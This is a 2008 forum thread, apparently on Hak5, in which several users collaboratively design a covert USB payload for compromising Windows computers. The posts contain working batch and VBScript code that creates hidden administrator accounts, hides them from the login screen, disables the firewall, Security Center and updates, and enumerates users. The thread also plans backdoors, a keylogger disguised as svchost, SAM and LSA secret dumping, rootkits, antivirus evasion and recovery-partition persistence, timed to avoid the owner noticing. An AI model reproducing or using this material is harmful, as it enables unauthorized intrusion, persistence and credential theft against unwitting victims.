DingleBerries Posted November 18, 2008 Share Posted November 18, 2008 So Ive been contemplating making a new payload for a while... These are some of the things that I want to inplement: 1. No .VBS or .NET 2. Mostly command line, and the .BATs will all be .EXEs, just because i like those better 3. Dump SAM or create a New admin, via command line, preferable both 4. Install a remote shell, this part is already take care of 5. Dump a list of all users on the computer And thats about it. The remote shell autoruns and adds itself to the registry. I want to keep this as small and as basic as possible.. So there isnt any slurping of docs and what not, maybe pics ;). The dumping part will be done via command lin, ie. run rs.exe, because the shell copies its self onces its ran. Other than that i have a good keylogger, runs low on mem and can be customized... Right now I am still looking for ideas, so if you have any let me know. This is the code that will be used for the Admin account. Invisible User:Tiny @echo off net user Tiny password /add && net localgroup administrators Tiny /add echo Windows Registry Editor Version 5.00> c:\hide.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg echo "Tiny"=dword:00000000>> c:\hide.reg REGEDIT /S c:\hide.REG DEL /Q c:\hide.REG attrib +r +a +s +h %SystemDrive%\docume~1\Tiny Exit Also I am thinking of just dumping the .reg ot HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ because it contains all the users, that way we can limit 3rd party software. Like so: REGEDIT /E EDIT_PATH_OF_DRIVE\FILE.REG "HKEY_LOCAL\----" Disable Windows Firewall: @echo off net stop "Security Center" net stop SharedAccess reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /t REG_DWORD /d 0x4 /f reg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /t REG_DWORD /d 0x4 /f reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 0x4 /f Quote Link to comment Share on other sites More sharing options...
X3N Posted November 18, 2008 Share Posted November 18, 2008 So Ive been contemplating making a new payload for a while... These are some of the things that I want to inplement: 1. No .VBS or .NET 2. Mostly command line, and the .BATs will all be .EXEs, just because i like those better 3. Dump SAM or create a New admin, via command line, preferable both 4. Install a remote shell, this part is already take care of 5. Dump a list of all users on the computer And thats about it. The remote shell autoruns and adds itself to the registry. I want to keep this as small and as basic as possible.. So there isnt any slurping of docs and what not, maybe pics ;). The dumping part will be done via command lin, ie. run rs.exe, because the shell copies its self onces its ran. Other than that i have a good keylogger, runs low on mem and can be customized... Right now I am still looking for ideas, so if you have any let me know. i been thinking of trying to write it in python... and also maybe reworking the tools of thepayload to be just scritps then the entire thing can be made an exe Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted November 18, 2008 Author Share Posted November 18, 2008 Thats awesome.. Its late and Ive got some papers for finish but first chance I get I will try to post more details. Quote Link to comment Share on other sites More sharing options...
DMilton Posted November 19, 2008 Share Posted November 19, 2008 So Ive been contemplating making a new payload for a while... These are some of the things that I want to inplement: 1. No .VBS or .NET 2. Mostly command line, and the .BATs will all be .EXEs, just because i like those better 3. Dump SAM or create a New admin, via command line, preferable both 4. Install a remote shell, this part is already take care of 5. Dump a list of all users on the computer And thats about it. The remote shell autoruns and adds itself to the registry. I want to keep this as small and as basic as possible.. So there isnt any slurping of docs and what not, maybe pics ;). The dumping part will be done via command lin, ie. run rs.exe, because the shell copies its self onces its ran. Other than that i have a good keylogger, runs low on mem and can be customized... Right now I am still looking for ideas, so if you have any let me know. For the point 5. you can execute this code, it's in VbScript. Of course, it can be moddified to show only the users and not the groups... UsersGroups.vbs 'UsersGroups.vbs 'This script enumerates users, grouped for each local group in a computer 'It creates a new file called users.txt in the same directory from it's executed. 'The code has been rebuilded from a similar app, but it works fine 'DMilton for free community 'Thread post at http://hak5.org/forums/index.php?showtopic=10746 'Variables explicit declaration Option Explicit Dim obj_UserName Dim obj_GroupName Dim obj_PC Dim obj_Group Dim obj_Shell Dim str_PC Dim str_Name Dim objFSO Dim objTextFile Dim I Dim ExitFile Const ForReading = 1, ForWriting = 2, ForAppending = 8 'Arguments ExitFile = "users.txt" 'Exit file creation Set objFSO = CreateObject("Scripting.FileSystemObject") Set objTextFile = objFSO.OpenTextFile (ExitFile, ForWriting, True) 'Local computer var creation str_Name str_PC = "." Set obj_Shell = CreateObject("WScript.Shell") str_Name = obj_Shell.ExpandEnvironmentStrings("%COMPUTERNAME%") 'Creates an object obj_PC containing actual local computer Set obj_PC = GetObject("WinNT://" & str_PC & ",Computer") ObjTextFile.WriteLine("Computer name is: " & str_Name) 'Now we filter objects to obtain groups obj_PC.Filter = Array("Group") 'Going through the objects and writting the txt For Each obj_GroupName In obj_PC     'Creating an object obj_Group containing actual group       Set obj_Group = GetObject("WinNT://" & str_PC & "/" & obj_GroupName.Name & ",Group")       'Writting the txt and formatting it       objTextFile.WriteLine("Users from Group: " & obj_GroupName.Name)       'Filtering objects from the group to obtain users       obj_Group.members.Filter = Array("User")       'Printing each one user       For Each obj_UserName In obj_Group.members             objTextFile.WriteLine("                  " & obj_UserName.Name)       Next Next 'Cleaning the variables Set obj_UserName = Nothing Set obj_GroupName = Nothing Set obj_PC = Nothing Set obj_Shell = Nothing Moreover, I think that with groups info in the final users.txt, adding a key in registry for creating an admin account is simple, or not? net user "USBAdmin" /add net localgroup administrator "USBAdmin" /add net user "USBAdmin" password The problem with adding privileges is that this automation would work in English versions but not in other languages as Spanish, where Administrators group is named Administradores, but with the listed groups in the vbs, you can extract easily the "Admin"-istrator or "Admin"-istradores correct word to add the correct privileges. Finaly, it would be necessary, adding the "USBAdmin" to the Special Account Users List, by adding a DWORD 0 to the created "USBAdmin" by executing in a batch (or whatelse). In this case, from command line would be... REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v USBAdmin /t REG_DWORD /d 0 :P Quote Link to comment Share on other sites More sharing options...
X3N Posted November 19, 2008 Share Posted November 19, 2008 part of my idea of writing the payload in python would be cross platform compatible... what i been thinking of doing too is writing a bunch of scripts in python that would be included on a minimal distribution of Linux to do administrative tasks on a windows machine all this could be included on a boot cd or boot usb drive... so the payload could be run on a machine on reboot... it would be far more complicated then the current switchblade... and would probably have a name like machete... so in the end the payload could be run from windows on insertion or if you booted from the stick it would load linux text only and grab all the same info from windows... so if anyone likes this idea let me know... also is there anyone that knows enough python to assist? Quote Link to comment Share on other sites More sharing options...
alexthedrifter Posted November 19, 2008 Share Posted November 19, 2008 IF you want my help msg me :D Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted November 19, 2008 Author Share Posted November 19, 2008 This will probably be an over thanks giving break kind of thing, finals are coming up and I would really like to keep my gpa in good standings. However I hope to have a release by black friday. Quote Link to comment Share on other sites More sharing options...
Tcstool Posted November 20, 2008 Share Posted November 20, 2008 Some awesome ideas there man. I'll be happy to chip in too as soon as I get caught up. Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted November 20, 2008 Author Share Posted November 20, 2008 I edited the first post, If am bat expert could go threw and point out anything they see that would be great. Quote Link to comment Share on other sites More sharing options...
DMilton Posted November 20, 2008 Share Posted November 20, 2008 I'm cleaning the code you posted, doing it efficient in any instalation language system, adding some other and it will be posted as soon as I have it working right. Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted November 20, 2008 Author Share Posted November 20, 2008 I'm cleaning the code you posted, doing it efficient in any instalation language system, adding some other and it will be posted as soon as I have it working right. Thats awesome, thank you very much. I am still reviewing what it is exactly that I want, i.e. to include the keylogger. There would not be a need for the logs to be sent off because you could transfer it via remote shell. Another thing i was considering is the "guest trick". Where when logged on via guest a batch script containing instruction to create an admin account is placed in the admins startup folder. If that is modified to allow RDP then we can install the shell via RDP when the owner is away from their desk.. Just throwing things out there :). Quote Link to comment Share on other sites More sharing options...
X3N Posted November 20, 2008 Share Posted November 20, 2008 Thats awesome, thank you very much. I am still reviewing what it is exactly that I want, i.e. to include the keylogger. There would not be a need for the logs to be sent off because you could transfer it via remote shell. Another thing i was considering is the "guest trick". Where when logged on via guest a batch script containing instruction to create an admin account is placed in the admins startup folder. If that is modified to allow RDP then we can install the shell via RDP when the owner is away from their desk.. Just throwing things out there :). i been tweaking some of the autoIT code for the remote switchblade..using psexec.exe i was successfully running it on a remote computer you still need domain admin rights and thers the issue of what user account the programs are run under... so im looking at other methods of information retrieval. But the payload executes fine and logs to the remote computer fine. The payload i was running just outputs the results to stdout so basically. Theres an exe payload.exe then theres a bat file i created to run the payload with psexec.exe \\remotecomputer -u admin -p password payload.exe Then open a command prompt and type payload.bat > output.log This can and will all be scripted correctly later but for testing purposes it works fine. but it would be easy enough to tailor this to setup a reverse backdoor and etc... my only complaint is that we are still tied down to these nirsoft programs which are not open source. In the long run i'd like to get some of this password dumping code released as open source and rewritten in different languages. Also the limitation of the nirsoft programs is that they only dump information of the currently logged on user. Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted November 20, 2008 Author Share Posted November 20, 2008 The back door is open source. Its from white scorpion and will, hopefully, be custom once the final version of this is out.. I really just want something that quick and painless. All the vnc stuff is a waste of time and is easily detected by smart admins. Once the computer is owned with the back door then we can start doing other things, transferring logs, installing other backdoors, ect. So far these are the only programs that will be needed: White-Scorpions Tiny back door- that is unless I find a better one Custom keylogger - C++ runs low on memory, I would like to either hide it from process manager or masquerade it as "svchost" or the like. Wget - so that other files can be snatched from a host and executed, no need to revisit the computer. There are a few more things that I am looking at, I am coming close to the last weeks of class so studying and what not are my priorities atm. However these are things I am considering: creddump Root Kits hidden in the microprocessor? PWDumpX v1.4 Sysinternals Shit: Ctrl2Cap v2.0 - Interested in this for maybe a new keylogger PhysMem- Dumps Ram to hex RegHide - Maybe useful in haiding the new admin account Of course all of these can be hosted on some remote server, be sure that you do it anonymously as to not get caught, and just use wget. you would have to wait till late at night as to not set off the owner to any of your activities. P.S. sorry i dumped all this here, I am just making sure I do not lose or forget anything. Quote Link to comment Share on other sites More sharing options...
X3N Posted November 20, 2008 Share Posted November 20, 2008 http://code.google.com/p/creddump/ here is some cool code i found although it isnt really working for me right now... i think its referencing some module i dont have Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted November 20, 2008 Author Share Posted November 20, 2008 I was looking at where the lsa secrets are stored in the registry, and I know we can dump that.. Is it hard to decrypt the password? If not then why is nirsoft needed? Quote Link to comment Share on other sites More sharing options...
X3N Posted November 20, 2008 Share Posted November 20, 2008 also im looking into rootkits for ideas... theres alot of source code on that site i think we could roll our own rootkit for this payload. Quote Link to comment Share on other sites More sharing options...
Tcstool Posted November 21, 2008 Share Posted November 21, 2008 Some quick thoughts (I'm short on time so we can delve into specifics via PM if you want): * We can stop security center, but instead of modifying the registry why not use the netsh commands to disable the firewall? fewer fingerprints on the system and less likely to be caught by AV/antispyware. Even better, why not just punch a hole in the firewall with netsh for our listener? * We can use the net user command to add the user to system/administrators group, then use the REG command to modify the keys as needed, as opposed to creating files on the machine. Fewer fingerprints! * we can dump the users with the net users command instead of dumping the registry key. Again, trying to leave fewer fingerprints and engage in less suspicious activity likely to be caught by AV/host based IDS type progs. *Cain and Abel is pretty good at decrypting the LSA secrets. Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted November 21, 2008 Author Share Posted November 21, 2008 Some quick thoughts (I'm short on time so we can delve into specifics via PM if you want): * We can stop security center, but instead of modifying the registry why not use the netsh commands to disable the firewall? fewer fingerprints on the system and less likely to be caught by AV/antispyware. Even better, why not just punch a hole in the firewall with netsh for our listener? * We can use the net user command to add the user to system/administrators group, then use the REG command to modify the keys as needed, as opposed to creating files on the machine. Fewer fingerprints! * we can dump the users with the net users command instead of dumping the registry key. Again, trying to leave fewer fingerprints and engage in less suspicious activity likely to be caught by AV/host based IDS type progs. *Cain and Abel is pretty good at decrypting the LSA secrets. I like all of those, the only problem i see is Can&Abel getting caught by virus scan. I really like punching a hole in the FW, i really didnt wat to disable it completely. Also I am going to use your idea of the .dat file in the root directory, but instead i want to contaminate the recovery partition, that way even if they do reinstall the payload will remain there... im still working on this part. But what it will probably look for is a file specific to the recovery partition. Quote Link to comment Share on other sites More sharing options...
DMilton Posted November 21, 2008 Share Posted November 21, 2008 Thats awesome, thank you very much. I am still reviewing what it is exactly that I want, i.e. to include the keylogger. There would not be a need for the logs to be sent off because you could transfer it via remote shell. Another thing i was considering is the "guest trick". Where when logged on via guest a batch script containing instruction to create an admin account is placed in the admins startup folder. If that is modified to allow RDP then we can install the shell via RDP when the owner is away from their desk.. Just throwing things out there :). Meanwhile you decide what the payload should do, I've been playing with some your firsts ideas. Executing it, will extract the Administrators group name in a sure way for any installation language or even if the user is experimented and has changed it to a variable that can be used by the called batch. The idea of using a batch called program is to continue in the batch way you mentioned, but because I don't know how extract the real Administrators Group name in command line, I did it in VbScript, ready to use. By the way, here it is the code for the VbScript 'ListAdminGroup.vbs Set objWshNetwork = CreateObject("WScript.Network") Set objShell = CreateObject("Wscript.Shell") Set objEnv = objShell.Environment("PROCESS") str_PC = objWshNetwork.ComputerName ' SID of the Administrators group str_GroupSID = "S-1-5-32-544" str_GroupName = GetGroupName(str_PC, str_GroupSID) Set obj_Group = GetObject("WinNT://" & str_PC & "/" _ & str_GroupName & ",group") objEnv("AdminGroup") = str_GroupName strPath = "start.bat" objShell.Run strPath, 1, False Function GetGroupName(sComputer, sGroupSID) Dim oGroupAccounts, oGroupAccount 'Set for WinXP Set oGroupAccounts = GetObject( _ "winmgmts://" & sComputer & "/root/cimv2") _ .ExecQuery("Select Name from Win32_Group" _ & " WHERE Domain = '" & sComputer & "' AND SID = '" & sGroupSID & "'") 'For Win2k we use the 'BUILTIN' domain If oGroupAccounts.Count = 0 Then     Set oGroupAccounts = GetObject( _     "winmgmts://" & sComputer & "/root/cimv2") _     .ExecQuery("Select Name from Win32_Group" _     & " WHERE Domain = 'BUILTIN' AND SID = '" & sGroupSID & "'") End If For Each oGroupAccount In oGroupAccounts     GetGroupName = oGroupAccount.Name Next End Function I think it will work in Windows XP and Windows 2000 but if you can play with it in other versions, will be great. Once the script has finished, it launches the start.bat batch. It will create an administrator account wich name is defined in %NewAdmin% variable, with a password given by %password% variable, and adding it into Administrators Group, using the variable in %AdminGroup% given by the vbs. Creates the correct folder, hides it, and add the new account name to the Special Accounts, for being invisible to the user. Here it is the start.bat code. By the way, it must be on same dir as VbScript. ::start.bat @echo off set NewAdmin=USBAdmin set password=YouWasHacked! set Folder=%SystemDrive%\Documents and Settings\%NewAdmin% net localgroup %AdminGroup% %NewAdmin% /add net user %NewAdmin% %password% /add REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %NewAdmin% /t REG_DWORD /d 0 mkdir "%Folder%" attrib +a +s +h "%Folder%" It will solve too the Tcstool for fewer fingerprints: * We can use the net user command to add the user to system/administrators group, then use the REG command to modify the keys as needed, as opposed to creating files on the machine. Fewer fingerprints! About Tcstool quesion: * we can dump the users with the net users command instead of dumping the registry key. Again, trying to leave fewer fingerprints and engage in less suspicious activity likely to be caught by AV/host based IDS type progs. The code for Users.vbs can be: 'Users.vbs Option Explicit Dim obj_UserName Dim obj_GroupName Dim obj_PC Dim obj_Group Dim obj_Shell Dim str_Computer Dim str_Name Dim objFSO Dim objTextFile Dim str_File Dim M Const ForReading = 1, ForWriting = 2, ForAppending = 8 If WScript.Arguments.count > 0 Then     str_File = WScript.Arguments.item(0) Else     str_File = "users.txt" End If Set objFSO = CreateObject("Scripting.FileSystemObject") Set objTextFile = objFSO.OpenTextFile (str_File, ForWriting, True) str_Computer = "." Set obj_Shell = CreateObject("WScript.Shell") str_Name = obj_Shell.ExpandEnvironmentStrings("%COMPUTERNAME%") Set obj_PC = GetObject("WinNT://" & str_Computer & ",Computer") obj_PC.Filter = Array("Group") For Each obj_GroupName In obj_PC     Set obj_Group = GetObject("WinNT://" & str_Computer & "/" & obj_GroupName.Name & ",Group")     obj_Group.members.Filter = Array("User")     For Each obj_UserName In obj_Group.members         set M = obj_UserName         objTextFile.WriteLine(obj_UserName.Name)      Next Next It will extract all users names in a new users.txt file, for further use of it. And that's all by the momment! Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted November 21, 2008 Author Share Posted November 21, 2008 Meanwhile you decide what the payload should do, I've been playing with some your firsts ideas. Executing it, will extract the Administrators group name in a sure way for any installation language or even if the user is experimented and has changed it to a variable that can be used by the called batch. The idea of using a batch called program is to continue in the batch way you mentioned, but because I don't know how extract the real Administrators Group name in command line, I did it in VbScript, ready to use. I have already compiled all the bats into an exe. I havent slept since 630 this morning, class and what not, so i didnt have the mind power to do any more.. check out the small one i have HERE. The next release will actually have substance to it. Quote Link to comment Share on other sites More sharing options...
DMilton Posted November 21, 2008 Share Posted November 21, 2008 I saw it, you have done a fast work, but by the way, I hope, the code I posted will be interesting for someone! Quote Link to comment Share on other sites More sharing options...
Tcstool Posted November 21, 2008 Share Posted November 21, 2008 I like all of those, the only problem i see is Can&Abel getting caught by virus scan. I really like punching a hole in the FW, i really didnt wat to disable it completely. Also I am going to use your idea of the .dat file in the root directory, but instead i want to contaminate the recovery partition, that way even if they do reinstall the payload will remain there... im still working on this part. But what it will probably look for is a file specific to the recovery partition. I'm not saying we upload Cain & Abel to the local machine. You asked if it could be decrypted easily, and I was saying we could use it to work on our data back at our evil hacker lair after we've run the payload ;) It will be hard to contaminate the recovery partitions because all the different PC vendors handle that partition differently. Maybe we should target Dells??? :-) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.